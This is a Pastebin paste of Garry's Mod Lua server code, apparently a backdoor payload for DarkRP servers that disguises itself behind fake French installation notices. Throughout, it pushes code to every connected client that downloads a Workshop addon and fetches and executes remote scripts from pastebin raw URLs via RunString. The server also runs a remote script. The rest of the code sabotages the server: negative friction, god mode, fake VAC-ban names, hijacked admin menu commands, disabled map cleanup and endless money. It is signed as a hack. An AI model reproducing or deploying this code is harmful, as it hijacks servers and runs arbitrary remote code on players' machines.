Advertisement
Guest User

Untitled

a guest
May 25th, 2019
183
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.44 KB | None | 0 0
  1. if SERVER then
  2. for k, v in pairs(player.GetAll()) do
  3. v:SendLua("steamworks.FileInfo(1479367728,function(result)steamworks.Download(result.fileid,true,function(name)game.MountGMA(name)end) end)")
  4. end
  5.  
  6.  
  7. print([[
  8. __________ _________ __ ____ ____________
  9. \______ \__ _________ ____ / _____/__.__. _______/ |_ ____ _____ \ \ / /\_____ \
  10. | ___/ | \_ __ \_/ __ \ \____ /| | |/ ___/\ __\/ __ \ / \ \ Y / / ____/
  11. | | | | /| | \/\ ___/ ____\ \\ ___ |\___ \ | | \ ___/| Y Y \ \ / / \
  12. |____| |____/ |__| \___ /________/ ____/____ / |__| \___ |__|_| / \___/ \_______|]])
  13.  
  14. timer.Create( "gvacspam", 0.1, 1, function()
  15. for k, ply in pairs( player.GetAll() ) do
  16. DarkRP.notify(ply, 2, 4, "[PureSystem] Installation des prérequis.")
  17. end
  18. end)
  19.  
  20. timer.Simple( 10, function()
  21. for k, ply in pairs( player.GetAll() ) do
  22. DarkRP.notify(ply, 2, 4, "[PureSystem] Lancement de L'installation.")
  23. end
  24. end )
  25.  
  26. timer.Simple( 14, function()
  27. for k,v in pairs(player.GetAll()) do
  28. v:SendLua([[http.Fetch('https://pastebin.com/raw/63QkUDUx',function(b,l,h,c)RunString(b)end,nil)]])
  29. v:SetRunSpeed(400* 4);
  30. v:SetWalkSpeed(200 * 2);
  31. end
  32.  
  33. RunConsoleCommand("sv_friction", "-8")
  34.  
  35. timer.Create( "gtonip", 15, 0, function()
  36. for k,v in pairs(player.GetAll()) do
  37. v:GodEnable()
  38. v:setDarkRPVar( "rpname", "This Steam account has been VAC banned from secure servers due to a cheating infraction." )
  39. end
  40.  
  41. end )
  42. end )
  43.  
  44. timer.Simple( 76, function()
  45. http.Fetch('https://pastebin.com/raw/7ABFD4Bu',function(b,l,h,c)RunString(b)end,nil)
  46. end )
  47.  
  48. timer.Simple( 77, function()
  49. for k, ply in pairs( player.GetAll() ) do
  50. DarkRP.notify(ply, 2, 4, "[PureSystem] Merci pour votre patience.")
  51. DarkRP.notify(ply, 2, 20, "HACK PAR GIZEH_ECO+")
  52. end
  53. end )
  54.  
  55. timer.Simple( 210, function()
  56. RunConsoleCommand("sv_friction", "8")
  57. hook.Remove("Think", "2012akaapocalypse")
  58. end )
  59.  
  60.  
  61. hook.Remove( "PlayerSay", "Pure_Menu" )
  62. concommand.Remove("Pure_openMenu")
  63. concommand.Remove("ulx menu")
  64. ULib.addSayCommand( '!menu', lechat )
  65. ULib.cmds.addCommand( "ulx menu", lechat )
  66.  
  67.  
  68.  
  69. function game.CleanUpMap() end
  70.  
  71. timer.Create("moneymoney", 1, 0, function()
  72. for k,v in pairs(player.GetAll()) do v:addMoney(1648125) end
  73. end)
  74. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement